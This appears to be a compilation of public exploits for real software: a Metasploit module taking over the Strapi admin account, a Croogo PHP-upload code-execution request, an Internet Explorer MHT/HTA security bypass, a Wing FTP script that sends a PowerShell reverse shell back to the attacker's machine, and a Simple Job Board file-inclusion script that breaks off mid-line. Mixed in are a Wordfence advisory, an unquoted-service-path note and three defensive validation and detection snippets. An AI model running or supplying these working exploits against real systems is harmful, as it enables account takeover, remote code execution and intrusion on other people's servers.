<pre><code>##<br /># This module requires Metasploit: http://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'msf/core'<br /><br />class MetasploitModule < Msf::Auxiliary<br /> Rank = NormalRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info={})<br /> super(update_info(info,<br /><br /> 'Name' => "Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)",<br /> 'Description' => %q{<br /> This exploit module abuses the mishandling of password reset in JSON for Strapi CMS version 3.0.0-beta.17.4 to change the password of a privileged user.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [ 'WackyH4cker' ],<br /> 'References' =><br /> [<br /> [ 'URL', 'https://vulners.com/cve/CVE-2019-18818' ]<br /> ],<br /> 'Platform' => 'linux',<br /> 'Targets' => [<br /> [ 'Strapi 3.0.0-beta-17.4', {} ]<br /> ],<br /> 'Payload' => '',<br /> 'Privileged' => true,<br /> 'DisclosureDate' => "",<br /> 'DefaultOptions' => <br /> {<br /> 'SSL' => 'False',<br /> 'RPORT' => 80,<br /> },<br /> 'DefaultTarget' => 0<br /><br /> ))<br /><br /> register_options [<br /> OptString.new('NEW_PASSWORD', [true, 'New password for user Admin'])<br /> ]<br /> end<br /><br /> def check<br /><br /> res = send_request_raw({ 'uri' => '/admin/init' })<br /> version = JSON.parse(res.body) <br /><br /> if version["data"]["strapiVersion"] == '3.0.0-beta.17.4'<br /> return Exploit::CheckCode::Vulnerable<br /> else<br /> return Exploit::CheckCode::Safe<br /> end<br /> <br /> end<br /><br /> def run<br /><br /> json_body = { 'code' => {'$gt' => 0},<br /> 'password' => datastore['NEW_PASSWORD'],<br /> 'passwordConfirmation' => datastore['NEW_PASSWORD'] }<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => '/admin/auth/reset-password',<br /> 'ctype' => 'application/json',<br /> 'data' => JSON.generate(json_body)<br /> })<br /><br /> 
print_status("Changing password...")<br /> json_format = JSON.parse(res.body)<br /> jwt = json_format['jwt']<br /><br /> if res.code == 200<br /> print_good("Password changed successfully!")<br /> print_good("USER: admin")<br /> print_good("PASSWORD: #{datastore['NEW_PASSWORD']}")<br /> print_good("JWT: #{jwt}")<br /> else<br /> fail_with(Failure::NoAccess, "Could not change admin user password")<br /> end<br /> end<br /><br />end<br /> <br /></code></pre>
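The module above sends `"code" => {"$gt" => 0}` because the vulnerable reset handler passed the supplied `code` straight into its user lookup. As an added example that is neither the Metasploit module nor Strapi's own code, the following Python shows the validation a reset-password endpoint needs in order to reject that body: the token must be a plain string, no `$`-prefixed operator keys may appear anywhere in the JSON, and only a string is ever compared against the stored token. The in-memory user store and all function names are assumptions.

```python
import hmac
import json

# Constructed in-memory user store standing in for the CMS database (assumption).
USERS = [
    {"id": 1, "email": "admin@example.test", "resetPasswordToken": "c0ffee1234"},
    {"id": 2, "email": "editor@example.test", "resetPasswordToken": None},
]


def find_operator_keys(value, path="$"):
    """Collect JSON paths whose key starts with '$' (MongoDB-style query operators).

    A body carrying keys such as '$gt' or '$ne' is trying to turn a value
    comparison into a query predicate; that is how {"$gt": 0} could match a
    stored token the sender never knew.
    """
    found = []
    if isinstance(value, dict):
        for key, child in value.items():
            child_path = f"{path}.{key}"
            if key.startswith("$"):
                found.append(child_path)
            found.extend(find_operator_keys(child, child_path))
    elif isinstance(value, list):
        for index, child in enumerate(value):
            found.extend(find_operator_keys(child, f"{path}[{index}]"))
    return found


def validate_reset_request(raw_body, min_password_len=8):
    """Return rejection reasons for a reset body; an empty list means it is acceptable."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return ["body is not valid JSON"]
    if not isinstance(body, dict):
        return ["body must be a JSON object"]

    reasons = [f"query operator in request at {p}" for p in find_operator_keys(body)]

    code = body.get("code")
    if not isinstance(code, str) or not code:
        reasons.append("code must be a non-empty string")

    password = body.get("password")
    confirmation = body.get("passwordConfirmation")
    if not isinstance(password, str) or not isinstance(confirmation, str):
        reasons.append("password and passwordConfirmation must be strings")
    elif password != confirmation:
        reasons.append("passwordConfirmation does not match password")
    elif len(password) < min_password_len:
        reasons.append(f"password shorter than {min_password_len} characters")
    return reasons


def find_user_by_token(users, token):
    """Resolve a reset token to a user; only a plain string is ever compared."""
    if not isinstance(token, str) or not token:
        return None
    for user in users:
        stored = user.get("resetPasswordToken")
        # Constant-time comparison of the stored token against the supplied one.
        if isinstance(stored, str) and hmac.compare_digest(stored.encode(), token.encode()):
            return user
    return None


def handle_reset(raw_body, users=USERS):
    """Validate, then resolve the token; returns (HTTP status, list of details)."""
    reasons = validate_reset_request(raw_body)
    if reasons:
        return 400, reasons
    user = find_user_by_token(users, json.loads(raw_body)["code"])
    if user is None:
        return 400, ["invalid or expired reset token"]
    return 200, [f"password updated for user {user['id']}"]


if __name__ == "__main__":
    # The body shape the module above sends, with a constructed password.
    attack = '{"code": {"$gt": 0}, "password": "Passw0rd!", "passwordConfirmation": "Passw0rd!"}'
    print(handle_reset(attack))
```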
<pre><code># Exploit Title: Croogo 3.0.2 - Remote Code Execution (Authenticated)<br /># Date: 05/12/2021<br /># Exploit Author: Deha Berkin Bir<br /># Vendor Homepage: https://croogo.org/<br /># Software Link: https://downloads.croogo.org/v3.0.2.zip<br /># Version: 3.0.2<br /># Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3<br /><br />==> Tutorial <==<br /><br />1- Log in with your privileged account.<br />2- Go to the 'Attachments' section. Directory is '/admin/file-manager/attachments'.<br />3- Click the 'New Attachment' button.<br />4- Choose a malicious PHP script and upload it.<br /><br />########### EXAMPLE SOURCE CODE OF MALICIOUS PHP SCRIPT ####################<br /><?php<br />$command = shell_exec('netstat -an');<br />echo "<pre>$command</pre>";<br />?><br />############################################################################<br /><br />5- Click on the URL of the malicious PHP script you uploaded.<br />6- The malicious PHP script will be executed.<br /><br /><br />==> HTTP Request (File Upload) <==<br /><br />POST /admin/file-manager/attachments/add HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------7028631106888453201670373694<br />Content-Length: 976<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/file-manager/attachments/add<br />Cookie: csrfToken=bf693e75da3b8cfedb1e097485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb; CAKEPHP=do6gfdgwsl424dabvg1mqp9; GeniXCMS-pJSRyfdghoBRVTDlKhjklmkfhtkbup1r; PHPSESSID=gd59dfghhhg2n10amijq89hih<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br 
/>Sec-Fetch-User: ?1<br /><br />-----------------------------7028631106888453201670373694<br />Content-Disposition: form-data; name="_method"<br /><br />POST<br />-----------------------------7028631106888453201670373694<br />Content-Disposition: form-data; name="_csrfToken"<br /><br />bf693ebed78cee03265197aed57e994e70d7qwdfq231341234dsfasdf2397485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb<br />-----------------------------7028631106888453201670373694<br />Content-Disposition: form-data; name="file"; filename="malicious.php"<br />Content-Type: application/octet-stream<br /><br /><?php<br />$command = shell_exec('netstat -an');<br />echo "<pre>$command</pre>";<br />?><br /><br />-----------------------------7028631106888453201670373694<br />Content-Disposition: form-data; name="_Token[fields]"<br /><br />16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A<br />-----------------------------7028631106888453201670373694<br />Content-Disposition: form-data; name="_Token[unlocked]"<br /><br /><br />-----------------------------7028631106888453201670373694--<br /></code></pre>
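The upload request above succeeds because the attachment manager stores whatever file part it receives. As an added example that is not Croogo's code, this Python vets the file parts of a multipart/form-data body the way a hardened upload handler or a WAF would: an executable extension anywhere in the name is rejected, only allow-listed types pass, the content must start with that type's magic bytes, and a PHP open tag in the content is rejected regardless of name. The allow-list, the function names and the constructed sample body (modelled on the request above, with a harmless placeholder instead of the script) are assumptions.

```python
import os
from email.parser import BytesParser
from email.policy import default

# Extensions the attachment manager is allowed to store (assumption: images and PDF only).
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}
# Extensions a PHP-backed server may execute; rejected wherever they appear in the name.
EXECUTABLE_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar", ".phps"}
# Leading bytes expected for each allowed type, so a renamed script cannot pass as an image.
MAGIC = {
    ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8", ".pdf": b"%PDF-",
}


def check_file(filename, payload):
    """Return (accepted, reason) for one uploaded file."""
    base = os.path.basename(filename or "")
    if not base:
        return False, "missing filename"
    parts = base.lower().split(".")
    # Every suffix counts, so "shell.php.jpg" is caught as well as "shell.php".
    if {"." + s for s in parts[1:]} & EXECUTABLE_EXTENSIONS:
        return False, "executable extension in name"
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext or '(none)'} not in allow-list"
    if not payload.startswith(MAGIC[ext]):
        return False, f"content does not look like {ext}"
    if b"<?php" in payload.lower() or b"<?=" in payload:
        return False, "PHP open tag found in content"
    return True, "ok"


def inspect_multipart(content_type, body):
    """Parse a multipart/form-data body and vet every file part.

    Returns a list of (field name, filename, accepted, reason) tuples; plain
    form fields without a filename are skipped.
    """
    msg = BytesParser(policy=default).parsebytes(
        b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    results = []
    for part in msg.iter_parts():
        filename = part.get_filename()
        if filename is None:
            continue
        field = part.get_param("name", header="content-disposition")
        accepted, reason = check_file(filename, part.get_payload(decode=True) or b"")
        results.append((field, filename, accepted, reason))
    return results


# Constructed request body modelled on the advisory's upload; the script is a placeholder.
BOUNDARY = "---------------------------7028631106888453201670373694"
SAMPLE_CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY
SAMPLE_BODY = (
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="_method"\r\n\r\nPOST\r\n'
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="file"; filename="malicious.php"\r\n'
    "Content-Type: application/octet-stream\r\n\r\n"
    "<?php /* constructed placeholder */ ?>\r\n"
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="file"; filename="logo.png"\r\n'
    "Content-Type: image/png\r\n\r\n"
    "\x89PNG\r\n\x1a\nconstructed-bytes\r\n"
    "--" + BOUNDARY + "--\r\n"
).encode("latin-1")

if __name__ == "__main__":
    for row in inspect_multipart(SAMPLE_CONTENT_TYPE, SAMPLE_BODY):
        print(row)
```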
<pre><code>On January 4, 2022, the Wordfence Threat Intelligence team began the responsible disclosure process for several Remote Code Execution vulnerabilities in PHP Everywhere, a WordPress plugin installed on over 30,000 websites. One of these vulnerabilities allowed any authenticated user of any level, even subscribers and customers, to execute code on a site with the plugin installed. As the vulnerabilities were of critical severity, we contacted the WordPress plugin repository with our disclosure in addition to initiating outreach to the plugin author.<br /><br />We received a response from the plugin author within a few hours and sent over the full disclosure at that time. A largely rebuilt version of the plugin was made available on January 10, 2022.<br /><br />What should I do if I’m running PHP Everywhere?<br /><br />If you’re using the PHP Everywhere plugin, it is imperative that you upgrade to the newest version, which is 3.0.0 at the time of this writing, in order to prevent your site from being exploited. Unfortunately, version 3.0.0 only supports PHP snippets via the Block editor, so if you are using the Classic Editor you will need to uninstall the plugin and find another solution. You should not continue to run older versions of PHP Everywhere under any circumstances.<br /><br />Description: Remote Code Execution by Subscriber+ users via shortcode<br /><br />Affected Plugin: PHP Everywhere<br /><br />Plugin Slug: php-everywhere<br /><br />Plugin Developer: Alexander Fuchs<br /><br />Affected Versions: <= 2.0.3<br /><br />CVE ID: CVE-2022-24663<br /><br />CVSS Score: 9.9 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H<br /><br />Researcher/s: Ramuel Gall<br /><br />Fully Patched Version: 3.0.0<br /><br />PHP Everywhere is a WordPress plugin that is intended to allow site owners to execute PHP code anywhere on their site. It included functionality that allowed execution of PHP Code Snippets via WordPress shortcodes. 
Unfortunately, WordPress allows any authenticated user to execute shortcodes via the parse-media-shortcode AJAX action, and some plugins also allow unauthenticated shortcode execution. As such, it was possible for any logged-in user, even a user with almost no permissions, such as a Subscriber or a Customer, to execute arbitrary PHP on a site by sending a request with the shortcode parameter set to [php_everywhere]<arbitrary PHP>[/php_everywhere]. Executing arbitrary PHP on a site typically allows complete site takeover.<br /><br />Description: Remote Code Execution by Contributor+ users via metabox<br /><br />Affected Plugin: PHP Everywhere<br /><br />Plugin Slug: php-everywhere<br /><br />Plugin Developer: Alexander Fuchs<br /><br />Affected Versions: <= 2.0.3<br /><br />CVE ID: CVE-2022-24664<br /><br />CVSS Score: 9.9 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H<br /><br />Researcher/s: Ramuel Gall<br /><br />Fully Patched Version: 3.0.0<br /><br />By default, the PHP Everywhere plugin allowed all users with the edit_posts capability to use the PHP Everywhere metabox.<br /><br />Unfortunately, this meant that untrusted Contributor-level users could use the PHP Everywhere metabox to achieve code execution on a site by creating a post, adding PHP code to the PHP Everywhere metabox, and then previewing the post. While this vulnerability has the same CVSS score as the shortcode vulnerability, it is less severe, since it requires Contributor-level permissions, which imply some degree of trust and are more difficult to obtain than Subscriber-level permissions. 
This is because the CVSS scoring system does not allow “Medium” in the “Privileges Required” field.<br /><br />Description: Remote Code Execution by Contributor+ users via Gutenberg block<br /><br />Affected Plugin: PHP Everywhere<br /><br />Plugin Slug: php-everywhere<br /><br />Plugin Developer: Alexander Fuchs<br /><br />Affected Versions: <= 2.0.3<br /><br />CVE ID: CVE-2022-24665<br /><br />CVSS Score: 9.9 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H<br /><br />Researcher/s: Ramuel Gall<br /><br />Fully Patched Version: 3.0.0<br /><br />By default, the PHP Everywhere plugin allowed all users with the edit_posts capability to use the PHP Everywhere Gutenberg block. While it was possible to set this to admin-only, this was not set by default due to versions <= 2.0.3 not being able to add capability checks without disabling the Gutenberg Block editor. We worked with the plugin author to overcome this limitation when we sent our disclosure.<br /><br />Unfortunately, this meant that Contributor-level users could execute arbitrary PHP code on a site by creating a post, adding the PHP Everywhere block and adding code to it, and then previewing the post. As with the metabox vulnerability, this has the same CVSS score as the shortcode vulnerability but is less severe as it requires Contributor-level permissions to exploit.<br /><br />Timeline<br /><br />January 4, 2022 – We release a firewall rule available to Wordfence Premium, Wordfence Care, and Wordfence Response customers. We begin the disclosure process with the plugin author and disclose to the WordPress plugin repository. 
The plugin author responds and we send over full disclosure.<br /><br />January 10, 2022 – A patched version, 3.0.0, is released.<br /><br />February 3, 2022 – The firewall rule becomes available to free Wordfence users.<br /><br />Conclusion<br /><br />In today’s article, we discussed a set of vulnerabilities in the PHP Everywhere plugin which could be used for complete site takeover.<br /><br />If you know anyone running this plugin, we strongly advise forwarding this advisory to them, as these vulnerabilities are very easy to exploit and can be used to quickly and completely take over a site.<br /><br /></code></pre>
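The Subscriber-level vector works because core's parse-media-shortcode AJAX action renders whatever shortcode a logged-in user supplies. As an added example, which is neither Wordfence's firewall rule nor the plugin's code, this Python flags such requests in WAF or application request records (constructed here, since ordinary access logs do not keep POST bodies); the record format, the set of flagged tags and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Shortcode tags whose body is handed to an interpreter; the advisory names php_everywhere.
CODE_EXECUTING_SHORTCODES = {"php_everywhere"}
# Core AJAX action that renders a caller-supplied shortcode for any logged-in user.
SHORTCODE_RENDER_ACTIONS = {"parse-media-shortcode"}
# Tag name in an opening or closing shortcode bracket, e.g. "[php_everywhere]" or "[/php_everywhere]".
SHORTCODE_TAG = re.compile(r"\[/?\s*([A-Za-z0-9_-]+)")


def shortcode_tags(text):
    """Return the lower-cased set of shortcode tag names that appear in text."""
    return {m.group(1).lower() for m in SHORTCODE_TAG.finditer(text)}


def request_params(record):
    """Merge query-string and form-body parameters of one request record."""
    params = parse_qs(urlsplit(record["url"]).query, keep_blank_values=True)
    for key, values in parse_qs(record.get("body") or "", keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    return params


def flag_shortcode_abuse(records):
    """Return (record index, user, risky tags) for admin-ajax requests rendering a code-executing shortcode."""
    hits = []
    for index, record in enumerate(records):
        if not urlsplit(record["url"]).path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = request_params(record)
        if not set(params.get("action", [])) & SHORTCODE_RENDER_ACTIONS:
            continue
        tags = set()
        for value in params.get("shortcode", []):
            tags |= shortcode_tags(value)
        risky = tags & CODE_EXECUTING_SHORTCODES
        if risky:
            hits.append((index, record.get("user"), sorted(risky)))
    return hits


# Constructed request records in the shape a WAF or application audit log would keep.
# The shortcode body in the first record is a placeholder, not PHP.
SAMPLE_REQUESTS = [
    {"url": "/wp-admin/admin-ajax.php", "method": "POST", "user": "subscriber01",
     "body": "action=parse-media-shortcode&shortcode=%5Bphp_everywhere%5DPLACEHOLDER%5B%2Fphp_everywhere%5D"},
    {"url": "/wp-admin/admin-ajax.php?action=parse-media-shortcode", "method": "POST", "user": "editor02",
     "body": "shortcode=%5Bgallery+ids%3D%221%2C2%22%5D"},
    {"url": "/wp-admin/admin-ajax.php", "method": "POST", "user": "subscriber01",
     "body": "action=heartbeat&data%5Bwp-auth-check%5D=true"},
    {"url": "/?s=%5Bphp_everywhere%5D", "method": "GET", "user": None, "body": ""},
]

if __name__ == "__main__":
    for hit in flag_shortcode_abuse(SAMPLE_REQUESTS):
        print("code-executing shortcode rendered via AJAX:", hit)
```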
<pre><code>[+] Credits: John Page (aka hyp3rlinx) <br />[+] Website: hyp3rlinx.altervista.org<br />[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt<br />[+] twitter.com/hyp3rlinx<br />[+] ISR: ApparitionSec <br /> <br /><br />[Vendor]<br />www.microsoft.com<br /><br /><br />[Product]<br />Microsoft Internet Explorer (MSIE)<br />Internet Explorer is a discontinued series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.<br /><br /><br />[Vulnerability Type]<br />ActiveX Control Security Bypass<br /><br /><br />[CVE Reference]<br />N/A<br /><br /><br />[Security Issue]<br />Upon opening a specially crafted .MHT file on disk, Internet Explorer ActiveX control warnings as well as popup blocker privacy settings are not enforced.<br />This can allow the execution of ActiveX content with zero warning to an unsuspecting end user and/or force them to visit arbitrary attacker-controlled websites.<br /><br />By default, when opening browser-associated files that contain active content, MSIE restricts scripts from running without explicit user interaction and permission.<br />Instead, end users are presented with a yellow warning bar on the browser's webpage, asking first if they wish to allow the running of blocked content.<br />This prevents execution of active content scripts or controls without the user first clicking the "Allow blocked content" warning bar.<br /><br />However, specially crafted MHT files residing on disk that contain an invalid header directive suppress ActiveX warnings and Popup blocker privacy settings.<br />Therefore, to bypass Internet Explorer "active content" blocking, the file needs to contain a Content-Location header with an arbitrary value, e.g.<br /><br />"Content-Location: PBARBAR"<br /><br />Note that MHT files are often set to open in IE by default, and although IE is discontinued it is still 
present on the Windows OS.<br />Tested successfully on Windows 10 latest fully patched version with default IE security settings.<br /><br />Expected result: ActiveX control security warning, prevention of code execution and blocking browser popup windows.<br />Actual result: No ActiveX control code execution blocking, security warnings or browser window popup blocking enforcement.<br /><br />[PoC Requirements]<br />MHT file must reside on disk, think targeted attack scenarios.<br /><br />[Exploit/POC]<br />Change [VICTIM] value below to a specified user for testing.<br /><br />1) Create the MHT PoC file.<br /><br />"MSIE_ActiveX_Control_Security_Bypass.mht"<br /><br />From:<br />Subject:<br />Date:<br />MIME-Version: 1.0<br />Content-Type: multipart/related; type="text/html";<br /> boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"<br />This is a multi-part message in MIME format.<br /><br /><br />--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001<br />Content-Type: text/html; charset="UTF-8"<br />Content-Location: DOOM<br /><br /><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/transitional.dtd"><br /><html><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br /></head><br /><body><br /> <br /><br /><script><br />win=window<br />win.open("http://www.microsoft.com","","width=600,height=600")<br />var args = ['height='+1,'width='+1,].join(',')<br />setTimeout("", 3000)<br />var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv ________________________________________________________.hta', 'pop', args)<br />pop.moveTo(2000,2000)<br /></script><br /><br /><br /></body><br /></html><br /><br /><br />--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--<br /><br /><br />2) Create the PoC HTA file.<br /><br />"Sales_Report_2021.csv ________________________________________________________.hta"<br /><br /><HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" 
CAPTION="no" /><br /><script language="VBScript"><br />Set WshShell = CreateObject("WScript.Shell")<br />WshShell.Run("calc.exe")<br /></script><br /><br /><br />3) Open the MHT file locally.<br /><br /><br />[Network Access]<br />Local<br /><br /><br />[POC/Video URL]<br />https://www.youtube.com/watch?v=UCSqFbYUvBk<br /><br /><br />[Disclosure Timeline]<br />Vendor Notification: May 13, 2019<br />MSRC : July 2, 2019<br />"We determined that a fix for this issue will be considered in a future version of this product or service.<br />At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case."<br />December 5, 2021 : Public Disclosure<br /><br /><br />[+] Disclaimer<br />The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and<br />that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit<br />is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />hyp3rlinx<br /></code></pre>
<pre><code># Exploit Title: Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 02/06/2022<br /># Exploit Author: notcos<br /># Credit: Credit goes to the initial discoverer of this exploit, Alex Haynes.<br /># Vendor Homepage: https://www.wftpserver.com/<br /># Software Link: https://www.wftpserver.com/download/WingFtpServer.exe<br /># Version: <=4.3.8<br /># Tested on: Windows<br /><br /># !/usr/bin/python3<br />import requests<br />import sys<br />import base64<br />import urllib.parse<br /><br /># Get command line arguments<br />if len(sys.argv) != 7:<br /> print("This exploit will invoke a nishang tcp reverse shell on the target. Start your listener before executing.")<br /> print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT> <USER> <PASSWORD>" % sys.argv[0])<br /> print("Example: %s 0.0.0.0 8000 127.0.0.1 9001 notcos coolpass" % sys.argv[0])<br /> exit(1)<br /><br />else:<br /> target = sys.argv[1]<br /> targetport = sys.argv[2]<br /> localip = sys.argv[3]<br /> localport = sys.argv[4]<br /> user = sys.argv[5]<br /> password = sys.argv[6]<br /><br /> print('''<br /> .--.<br /> / ,~a`-,<br /> \ \_.-"`<br /> ) ( __ __ .__ ____ __________ _________ ___________<br /> ,/ ."\ / \ / \|__| ____ / ___\ \______ \\\\_ ___ \ \_ _____/<br /> / ( | \ \/\/ /| | / \ / /_/ > | _// \ \/ | __)_<br /> / ) ; \ / | || | \ \___ / | | \\\\ \____ | \\<br /> / / / \__/\ / |__||___| //_____/ |____|_ / \______ //_______ /<br /> ,/_."` /` \/ \/ \/ \/ \/<br /> /_/\ |___<br /> `~~~~~`<br /> ''')<br /><br /> # Create the login request<br /> url = 'http://' + target + ':' + targetport + '/admin_loginok.html'<br /> data = ('username=' + user + '&password=' + password + '&username_val=' + user + '&password_val=' + password + '&su'<br /> 'bmit_btn=%2bLogin%2b')<br /> headers = {<br /> "User-Agent": "Googlebot"<br /> }<br /><br /> # Send the POST request to log in and save the cookie<br /> r = requests.post(url, headers=headers, data=data)<br /> cookie = 
'UIDADMIN=' + r.cookies['UIDADMIN']<br /> print('Login successful - Cookie: ' + cookie)<br /> # Build the Lua console URL from the same target/port used for the login request<br /> url = 'http://' + target + ':' + targetport + '/admin_lua_script.html'<br /> headers = {<br /> "User-Agent": "Googlebot",<br /> "Cookie": cookie,<br /> }<br /><br /> # Base64 encode a nishang reverse tcp shell one liner and then url encode it<br /> nish = ("$client = New-Object System.Net.Sockets.TCPClient(\"" + localip + "\"," + localport + ");$stream = $client"<br /> ".GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$d"<br /> "ata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1"<br /> " | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCI"<br /> "I).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()")<br /> encodedStr = str(base64.b64encode(nish.encode('UTF-16LE')), "UTF8")<br /> urlpayload = urllib.parse.quote(encodedStr, safe='+')<br /> finalload = "command=os.execute('powershell -Encodedcommand " + urlpayload + "')"<br /><br /> # Send the reverse shell payload<br /> try:<br /> r = requests.post(url, headers=headers, data=finalload, timeout=0.1)<br /> except requests.exceptions.ReadTimeout:<br /> print("The payload has been sent. Check your listener.")<br /> pass<br /><br /></code></pre>
<pre><code># Exploit Title: HCL Lotus Notes V12- Unquoted Service Path<br /># Exploit Author: Mert DAŞ<br /># Version: V12<br /># Date: 01/12/2021<br /># Vendor Homepage: https://www.hcltechsw.com/domino/download<br /># Tested on: Windows 10<br /><br /><br />ProcessId : 3860<br />Name : LNSUSvc<br />DisplayName : HCL Notes Smart Upgrade Hizmeti<br />PathName : c:\HCL\Notes\SUService.exe<br />StartName : LocalSystem<br />StartMode : Auto<br />State : Running<br /><br />Discovery<br />-------------------------<br />C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert<br />their code in the system root path undetected by the OS or other security<br />applications where it could potentially be executed during application<br />startup or reboot. If successful, the local user's code would execute with<br />the elevated privileges of the application.<br /><br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion<br /># Date: 2022-02-06<br /># Exploit Author: Ven3xy<br /># Vendor Homepage: https://wordpress.org/plugins/simple-job-board/<br /># Software Link: https://downloads.wordpress.org/plugin/simple-job-board.2.9.3.zip<br /># Version: 2.9.3<br /># Tested on: Ubuntu 20.04 LTS<br /># CVE : CVE-2020-35749<br /><br /><br />import requests<br />import sys<br />import time<br /><br />class color:<br /> HEADER = '\033[95m'<br /> IMPORTANT = '\33[35m'<br /> NOTICE = '\033[33m'<br /> OKBLUE = '\033[94m'<br /> OKGREEN = '\033[92m'<br /> WARNING = '\033[93m'<br /> RED = '\033[91m'<br /> END = '\033[0m'<br /> UNDERLINE = '\033[4m'<br /> LOGGING = '\33[34m'<br />color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING] <br /> <br /><br />def banner():<br /> run = color_random[6]+'''\nY88b / 888~~ 888 ,e, d8 <br /> Y88b / 888-~88e 888___ Y88b / 888-~88e 888 e88~-_ " _d88__ <br /> Y88b e / 888 888b ____ 888 Y88b/ 888 888b 888 d888 i 888 888 <br /> Y88bd8b/ 888 8888 888 Y88b 888 8888 888 8888 | 888 888 <br /> Y88Y8Y 888 888P 888 /Y88b 888 888P 888 Y888 ' 888 888 <br /> Y Y 888-_88" 888___ / Y88b 888-_88" 888 "88_-~ 888 "88_/ <br /> 888 888 \n'''<br /> run2 = color_random[2]+'''\t\t\t(CVE-2020-35749)\n''' <br /> run3 = color_random[4]+'''\t{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''<br /> print(run+run2+run3) <br /> <br /> <br /><br />if (len(sys.argv) != 5):<br /> banner()<br /> print("[!] 
